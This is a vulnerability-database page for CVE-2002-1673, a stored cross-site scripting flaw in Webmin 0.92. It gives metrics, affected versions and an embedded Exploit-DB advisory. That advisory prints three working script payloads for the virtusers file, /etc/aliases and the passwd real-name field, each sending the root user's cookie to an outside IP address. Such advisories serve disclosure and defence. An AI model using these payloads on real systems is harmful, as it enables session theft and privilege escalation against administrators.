CVE-2002-1673 : Detail

CVE-2002-1673

0.04%V3
Local
2005-06-21
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The web interface for Webmin 0.92 does not properly quote or filter script code in files that are displayed to the interface, which allows local users to execute script and possibly steal cookies by inserting the script into certain files or fields, such as a real user name entry in the passwd file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.6 AV:L/AC:L/Au:N/C:P/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21348

Publication date : 2002-03-19 23h00 +00:00
Author : prophecy
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4329/info Webmin is a web-based interface for system administration of Unix and Linux operating systems. Webmin does not filter script code from output that may be displayed by the web interface, such as log files, etc. This may enable a local attacker, with write privileges to such files, to cause arbitrary script code to be executed by the root user. Additionally, an attacker who can contrive a way to inject malicious script code into other types of output displayed by the Webmin interface may also exploit this issue. This may enable the attacker to steal cookie-based authentication credentials from the root user, eventually resulting in an escalation of privileges for the local attacker. Insert the following line into the virtusers file, and wait for the root user to visit that page: </tt></a></td><tt><td><script>/* */document.write('<img src="http://192.168.40.1/'+document.cookie+'">');</script> Or the following into the /etc/aliases file: </a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*: */+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script> Potentially more likely to be exploited however, would be a malicious local user who has _no_ access to webmin, who could change a file that webmin views through the HTML interface (where the code being read in is not checked for HTML). An example would be changing their 'real name' in /etc/passwd to be something along the lines of: <script>zz=unescape("%3A");document.write('<img src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script> (Although chfn doesn't let you specify a username this long, but you get the idea.)

Products Mentioned

Configuraton 0

Webmin>>Webmin >> Version 0.1

Webmin>>Webmin >> Version 0.2

Webmin>>Webmin >> Version 0.3

Webmin>>Webmin >> Version 0.4

Webmin>>Webmin >> Version 0.5

Webmin>>Webmin >> Version 0.6

    Webmin>>Webmin >> Version 0.7

      Webmin>>Webmin >> Version 0.21

      Webmin>>Webmin >> Version 0.22

      Webmin>>Webmin >> Version 0.31

      Webmin>>Webmin >> Version 0.41

      Webmin>>Webmin >> Version 0.42

      Webmin>>Webmin >> Version 0.51

      Webmin>>Webmin >> Version 0.76

      Webmin>>Webmin >> Version 0.77

      Webmin>>Webmin >> Version 0.78

      Webmin>>Webmin >> Version 0.79

      Webmin>>Webmin >> Version 0.80

      Webmin>>Webmin >> Version 0.83

      Webmin>>Webmin >> Version 0.84

      Webmin>>Webmin >> Version 0.85

      Webmin>>Webmin >> Version 0.88

      Webmin>>Webmin >> Version 0.91

      Webmin>>Webmin >> Version 0.92

      Webmin>>Webmin >> Version 0.92.1

        References

        http://www.securityfocus.com/bid/4329
        Tags : vdb-entry, x_refsource_BID
        http://online.securityfocus.com/archive/1/263181
        Tags : mailing-list, x_refsource_BUGTRAQ